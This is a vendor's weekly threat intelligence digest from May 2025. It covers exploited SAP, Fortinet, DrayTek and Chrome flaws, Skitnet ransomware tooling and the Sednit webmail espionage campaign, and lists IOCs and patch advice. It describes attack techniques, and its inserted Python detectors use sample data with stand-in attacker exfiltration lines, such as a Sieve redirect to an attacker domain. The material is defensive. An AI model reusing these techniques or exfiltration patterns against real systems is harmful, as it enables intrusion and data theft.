Cyber Threat Intelligence Digest: Week 20

21st May 2025 - Threat Reports
  • Vulnerabilities
  • Potential Threats
  • General News
  • Threat Actor Weekly Graph
  • Global Trends Powered by Recorded Future
  • Prominent Information Security Events
  • Remediation Actions

Executive Summary - Highlights of the Cyber Threat Intelligence Digest

Vulnerabilities

BianLian and RansomEXX Exploit SAP NetWeaver Vulnerability CVE-2025-31324 for Remote Code Execution - On May 14, 2025, ReliaQuest updated its assessment of CVE-2025-31324, an unrestricted file upload vulnerability in SAP NetWeaver Visual Composer that allows unauthenticated uploads and remote code execution. Initial reporting on April 22, 2025, suggested a remote file inclusion vulnerability, though subsequent analysis aligned activity with CVE-2017-9844 due to behavioural similarities.

SAP confirmed that the vulnerability involved unrestricted file uploads and released a patch on April 24, 2025. SAP Visual Composer, deprecated since 2015, was the affected component. 

The report attributed exploitation activity to ransomware groups BianLian and RansomEXX. BianLian used a reverse proxy infrastructure that investigators linked to previously identified command-and-control (C2) servers. RansomEXX was identified in a separate incident involving post-exploitation activity. ReliaQuest observed these actions but noted that threat actors had not successfully deployed ransomware payloads during the incidents.

 

Fortinet Patches Actively Exploited Vulnerability Tracked as CVE-2025-32756 - On May 13, 2025, Fortinet patched an actively exploited stack-based buffer overflow flaw, CVE-2025-32756, in FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera products. CVE-2025-32756, exploited as a zero-day to target FortiVoice enterprise phone systems, can be exploited for remote code execution (RCE) to allow unauthenticated threat actors to execute arbitrary code by sending specially crafted HTTP requests to the device.

In Fortinet’s case, signs of exploitation included network scans, deletion of system crash logs, and the enabling of the fcgi debugging diagnostic feature, which was used to capture system or SSH credentials. Attackers may have also deployed malware, modified cron jobs to harvest credentials, and dropped network scanning scripts on compromised devices.

 

CISA Adds Three Vulnerabilities Affecting DrayTek Vigor Routers, Google Chrome, and SAP NetWeaver Visual Composer to Its Known Exploited Vulnerabilities Catalogue - On May 15, 2025, the US Cybersecurity and Infrastructure Security Agency added three vulnerabilities affecting products from DrayTek, Google, and SAP to its Known Exploited Vulnerabilities (KEV) catalogue. Technical details surrounding these vulnerabilities are as follows:

  • CVE-2024-12987 is an OS command injection vulnerability in DrayTek Vigor2960 and Vigor300B (version 1.5.1.4). Successful exploitation could allow threat actors to execute arbitrary commands, enabling them to alter configurations, access sensitive data, or infiltrate internal networks.
  • CVE-2025-4664 is an insufficient policy enforcement flaw in Chrome’s Loader component. Successful exploitation allows threat actors to access sensitive information from websites the victim is logged into by opening a maliciously crafted HTML page.
  • CVE-2025-42999 is a deserialization of untrusted data vulnerability in SAP NetWeaver Visual Composer. Successful exploitation could allow threat actors to upload malicious content that could compromise the host system.

 

Potential Threats

BlackBasta and Cactus Ransomware Groups Use New Skitnet Malware for Post-Exploitation - On May 16, 2025, BleepingComputer reported that ransomware groups, including BlackBasta and Cactus, used the backdoor malware Skitnet (also known as Bossnet) in enterprise phishing intrusions via Microsoft Teams.

The malware is used post-compromise to maintain access, execute remote commands, and communicate with command-and-control (C2) infrastructure. On April 4, 2025, Prodaft released a technical analysis identifying the developer of the malware as the threat actor LARVA-306. The report also noted that the malware was first advertised by threat actors on the RAMP forum in April 2024.

 

Russia-aligned Sednit Group Conducting Espionage Campaign Dubbed RoundPress Exploiting XSS Vulnerabilities on High-Value Webmail Servers - On May 15, 2025, ESET reported that threat group Sednit (aka BlueDelta) ran Operation RoundPress, an espionage campaign from 2023–2024 targeting government and defence entities across Europe, Africa, and South America. The group exploited vulnerabilities in webmail platforms Horde, MDaemon, RoundCube, and Zimbra to deliver tailored variants of their SpyPress malware via spearphishing emails using XSS exploits.

Each variant was customised to the targeted platform:

  • SpyPress.Horde: Stole credentials via an unspecified flaw.
  • SpyPress.MDaemon: Used CVE-2024-11182 to steal credentials, emails, contacts, 2FA secrets, and maintain access.
  • SpyPress.RoundCube: Used CVE-2020-35730 and CVE-2023-43770 to steal data and forward future emails via Sieve rules.
  • SpyPress.Zimbra: Used CVE-2024-27443 to steal emails and contacts.

 

Living-off-the-COM-Type-Coercion-Abuse, PoC Tool for Stealthy Command Execution via COM Type Coercion Abuse - On May 16, 2025, researcher Andrea Bocchetti (andreisss on GitHub) released a proof-of-concept tool called Living-off-the-COM-Type-Coercion-Abuse. It shows how attackers can exploit PowerShell’s .NET and COM automation features to stealthily run commands by abusing implicit type coercion.

The trick involves creating a custom object with an overridden .ToString() method that returns a command. When passed to a COM method like ShellExecute() expecting a string, PowerShell auto-calls .ToString(), executing the command. Bocchetti demonstrated this by using a C# class returning calc.exe, which gets executed via Shell.Application.

The technique bypasses standard PowerShell monitoring and has drawn some attention on GitHub.

 

General News

UK government confirms massive data breach following hack of Legal Aid Agency - Britain’s Ministry of Justice (MoJ) confirmed on Monday that hackers had “accessed a large amount of information” from people who had applied for legal aid, potentially including their criminal histories. According to the MoJ statement, everyone in England and Wales who applied for legal aid using the Legal Aid Agency’s online platform since 2010 may be affected.

Legal aid applicants “will include some of the most vulnerable people in our society,” said Gareth Mott, a research fellow at the Royal United Services Institute think tank and former lecturer in security and intelligence at the University of Kent.

The perpetrators of the data extortion incident claim to have data on more than 2 million people. The hackers have threatened to publish this data online in what would amount to one of the most significant data breaches to ever impact the British criminal justice system.

 

EU court rules that tracking-based online ads are illegal - The Brussels Court of Appeal ruled that the current consent model used by online advertisers, especially the Transparency and Consent Framework, violates the EU’s GDPR. This impacts big tech companies like Google, Amazon, Microsoft, and X, whose consent pop-ups were found inadequate for protecting user privacy during real-time bidding, where personal data is rapidly shared for targeted ads.

Amnesty International called the ruling a big win for privacy, urging a move away from surveillance-based ads. Meanwhile, ad fraud is rising. Meta was linked to nearly half of scam ads on Zelle in 2023–2024, and internal reports show most new Meta advertisers promoted scams or low-quality products.

 

23andMe sold for $256 million as buyer pledges to comply with existing privacy policies - Regeneron is acquiring key assets of 23andMe, including its genetic testing services and biobank, in a $256 million deal after the company filed for bankruptcy. Regeneron has promised to honour 23andMe’s existing privacy policies, which restrict sharing genetic data without legal orders and allow users to delete their information. Still, the deal has sparked public concern about how this highly sensitive data might be used in the future.

Privacy advocates, lawmakers, and the FTC have all voiced worries that consumers never fully consented to having their genetic data sold or used beyond personal health and genealogy purposes. A court-appointed privacy ombudsman will review the transaction, with a report due by June 10. In the wake of 23andMe’s bankruptcy, there’s been a sharp rise in users requesting their data be deleted.

 

Threat Actor Weekly Graph

Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.

Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.

Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.

Both intent and opportunity are scored out of 100 and together determine the group’s severity. These updates can be seen below.

 

 

Severity bands: Limited Severity | Basic Severity | Moderate Severity | High Severity

Threat Actor              Severity (previous -> current)   Opportunity (previous -> current)   Intent (previous -> current)
BlueDelta                 High -> High                     84 -> 86                            25 -> 25
CL0P Ransomware Group     High -> High                     83 -> 82                            49 -> 49
Kimsuky                   High -> High                     93 -> 92                            30 -> 30
FIN7                      High -> High                     80 -> 79                            25 -> 25
Sentp                     NEW -> Basic                     NEW -> 40                           NEW -> 30

 

Global Trends Powered by Recorded Future

Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol. 

The spikes in references are calculated over 60 days and are normalised to ensure they aren’t disproportionate when compared to bigger entities that will naturally have more baseline mentions.

- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.

Attackers                        Methods                Vulnerabilities    Targets
Chinese Hackers                  Backdoor               CVE-2025-4664      CoinBase
Distributed Denial of Secrets    Cross-Site Scripting   CVE-2020-1472      China
National Crime Agency            Social Engineering     CVE-2025-36560     UK Government
Rhysida Ransomware Group         SnipVex                CVE-2025-4427      Legal Aid Agency
Scattered Spider                 Spear Phishing         CVE-2025-11882     SK Telecom

 

Prominent Information Security Events

BlackBasta and Cactus Ransomware Groups Use New Skitnet Malware for Post-Exploitation

Source: Insikt Group | Validated Intelligence Event

IOC: SHA256 - a49fcd38da4a23acfe70c702fbe7b323eb5449fee15150cb0414b08c8a2cd8ee

IOC: SHA256 - 2455feb8790635850f2637e1e980d3aa390eefd10fd7048c28f6a075ef0b50aa

IOC: SHA256 - 37e4db74f8fed20689d35f4fc846cc8a73d594354336e4445338f9bd3e537076

On May 16, 2025, BleepingComputer reported that ransomware groups, including BlackBasta and Cactus, used the backdoor malware Skitnet (also known as Bossnet) in enterprise phishing intrusions via Microsoft Teams. 

The malware is used post-compromise to maintain access, execute remote commands, and communicate with command-and-control (C2) infrastructure. On April 4, 2025, Prodaft released a technical analysis identifying the developer of the malware as the threat actor LARVA-306. The report also noted that the malware was first advertised by threat actors on the RAMP forum in April 2024.

According to the Prodaft report, Skitnet uses a Rust-based first-stage payload that decrypts and maps a ChaCha20-encrypted Nim binary into memory using the DInvoke-rs library. The Nim payload establishes a DNS-based reverse shell by launching a cmd.exe process and creating three threads: one sends DNS queries to the C2 server every ten seconds, another captures and exfiltrates shell output, and the main thread waits for DNS responses containing threat actor commands. 

It builds DNS queries with random hexadecimal values using the nim-dnsprotocol library and resolves Windows API functions at runtime using GetProcAddress to evade static analysis. The C2 panel displays metadata for each infected host, including IP address, device ID (based on the C drive serial number), and system status.
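The beaconing pattern described above (queries with random hexadecimal labels to one domain at a fixed ten-second cadence) is something a defender can hunt for in DNS logs. The following heuristic detector is an added example, not code from the Prodaft report or from Skitnet itself; the log format, thresholds and sample lines are constructed assumptions.

```python
"""Heuristic detector for Skitnet-style DNS beaconing: a host that issues
queries with random hexadecimal leading labels to one domain every ~10 s."""
import re
from collections import defaultdict
from statistics import median, pstdev

# Constructed sample log lines ("timestamp_seconds client qname"); not real traffic.
SAMPLE_LOG = """\
1000 10.0.0.5 3fa9c2e1b7d4.c2-example.invalid
1010 10.0.0.5 91be77a0d2c5.c2-example.invalid
1020 10.0.0.5 0c4d5ee8aa13.c2-example.invalid
1030 10.0.0.5 7b1f0a9ccd22.c2-example.invalid
1040 10.0.0.5 e5d3b9074f18.c2-example.invalid
1000 10.0.0.7 www.example.com
1105 10.0.0.7 mail.example.com
1001 10.0.0.9 cdn.example.org
1011 10.0.0.9 cdn.example.org
1021 10.0.0.9 cdn.example.org
1031 10.0.0.9 cdn.example.org
1041 10.0.0.9 cdn.example.org
"""

HEX_LABEL = re.compile(r"^[0-9a-f]{8,}$")   # random-looking hex label, 8+ chars

def parse_log(text):
    """Yield (ts, client, qname) tuples from whitespace-separated log lines."""
    for line in text.splitlines():
        ts, client, qname = line.split()
        yield int(ts), client, qname.lower().rstrip(".")

def find_beacons(text, period=10.0, tolerance=2.0, min_queries=4):
    """Return {(client, base_domain): query_count} for clients that query a
    base domain with hex leading labels at a stable cadence close to `period`."""
    series = defaultdict(list)
    for ts, client, qname in parse_log(text):
        labels = qname.split(".")
        if len(labels) < 3 or not HEX_LABEL.match(labels[0]):
            continue                      # periodic but non-random names are ignored
        series[(client, ".".join(labels[1:]))].append(ts)
    hits = {}
    for key, times in series.items():
        if len(times) < min_queries:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        # stable interval near the expected period, with little jitter
        if abs(median(gaps) - period) <= tolerance and pstdev(gaps) <= tolerance:
            hits[key] = len(times)
    return hits
```

The 10.0.0.9 host queries cdn.example.org at the same cadence but with a fixed label, so it is deliberately not reported; real DNS logs will need the period and label thresholds tuned to the environment.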

 

Russia-aligned Sednit Group Conducting Espionage Campaign Dubbed RoundPress Exploiting XSS Vulnerabilities on High-Value Webmail Servers

Source: Insikt Group | Validated Intelligence Event

IOC: Hash - b6c340549700470c651031865c2772d3a4c81310

IOC: IP - 111[.]90[.]151[.]167

IOC: IP - 185[.]225[.]69[.]223

IOC: IP - 45[.]137[.]222[.]24

On May 15, 2025, ESET reported with medium confidence that Sednit (also tracked by Recorded Future as BlueDelta) conducted Operation RoundPress, an espionage campaign that exploited vulnerabilities in webmail platforms such as Horde, MDaemon, RoundCube, and Zimbra. This attribution is based on observed tactics, techniques, and procedures (TTPs) consistent with BlueDelta’s previous operations. Active between 2023 and 2024, Operation RoundPress targeted governmental and defence entities across Europe, Africa, and South America.

BlueDelta’s infection chain begins with spearphishing emails carrying malicious JavaScript code designed to exploit cross-site scripting (XSS) vulnerabilities in webmail platforms. When victims open a malicious email in a vulnerable webmail interface, the exploit triggers and delivers previously undocumented variants of the information-stealing malware SpyPress. The deployed variants depend on the webmail platform used by the victim and are as follows:

  • SpyPress.Horde: BlueDelta exploited an unspecified flaw in Horde to deploy SpyPress.HORDE. The malware steals webmail credentials.
  • SpyPress.MDaemon: BlueDelta exploited CVE-2024-11182 (patched November 14, 2024) in MDaemon to deploy SpyPress.MDAEMON. The malware steals webmail credentials, emails, contact lists, login history, and two-factor authentication (2FA) secrets, and creates an application password to maintain persistent access.
  • SpyPress.RoundCube: BlueDelta exploited CVE-2020-35730 and later CVE-2023-43770 (patched September 14, 2023) in Roundcube to deploy SpyPress.ROUNDCUBE. The malware steals webmail credentials, messages, address books, and about-page data, and installs a Sieve rule to forward future emails to BlueDelta-controlled command-and-control (C2) servers.
  • SpyPress.Zimbra: BlueDelta exploited CVE-2024-27443 (patched March 1, 2024) in Zimbra to deliver SpyPress.ZIMBRA. The malware steals webmail credentials, contacts, and email messages.

All variants exfiltrate compromised data via HTTPS POST requests to BlueDelta-controlled C2 servers.
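The Sieve forwarding rule SpyPress.ROUNDCUBE installs survives a password reset and a cleared browser session, so mailbox filters are worth auditing after such an intrusion. The scanner below is an added example rather than ESET’s or Roundcube’s code; the sample scripts and the internal-domain list are constructed assumptions.

```python
"""Audit user Sieve filters for redirect actions that send mail to addresses
outside the organisation, the persistence mechanism described for SpyPress.ROUNDCUBE."""
import re

# Constructed sample scripts keyed by mailbox; not taken from the ESET report.
SAMPLE_SCRIPTS = {
    "alice": 'require ["fileinto"];\n'
             'if header :contains "subject" "invoice" { fileinto "Finance"; }\n',
    "bob": 'require ["copy"];\n'
           '# keep a copy so the user notices nothing\n'
           'redirect :copy "archive@attacker-c2.invalid";\n',
    "carol": 'redirect "carol.backup@corp.example";\n',
}

# Sieve redirect action, with or without the :copy modifier from RFC 3894
REDIRECT = re.compile(r'\bredirect\b(?:\s+:copy)?\s+"([^"]+)"', re.IGNORECASE)

def strip_comments(script):
    """Drop whole-line '#' comments so a commented-out rule is not reported."""
    return "\n".join(l for l in script.splitlines() if not l.lstrip().startswith("#"))

def find_external_redirects(scripts, internal_domains):
    """Return [(mailbox, target)] for every redirect whose target domain is not internal."""
    findings = []
    for mailbox, script in scripts.items():
        for target in REDIRECT.findall(strip_comments(script)):
            domain = target.rpartition("@")[2].lower()
            if domain not in internal_domains:
                findings.append((mailbox, target))
    return findings
```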

 

Remediation Actions

Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:

  • CVE-2025-31324: Install the patch SAP released on April 24, 2025 that specifically addresses CVE-2025-31324.
  • CVE-2025-32756: Apply the May 13, 2025 Fortinet patch to all affected devices.
  • CVE-2025-42999, CVE-2025-4664, CVE-2024-12987: Apply the available patches for these vulnerabilities if the affected products are part of your tech stack. Please refer to the validation sources in this Analyst Note for the initial report on the exploitation of CVE-2025-42999 and CVE-2025-4664, as well as the disclosure of CVE-2024-12987.

If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.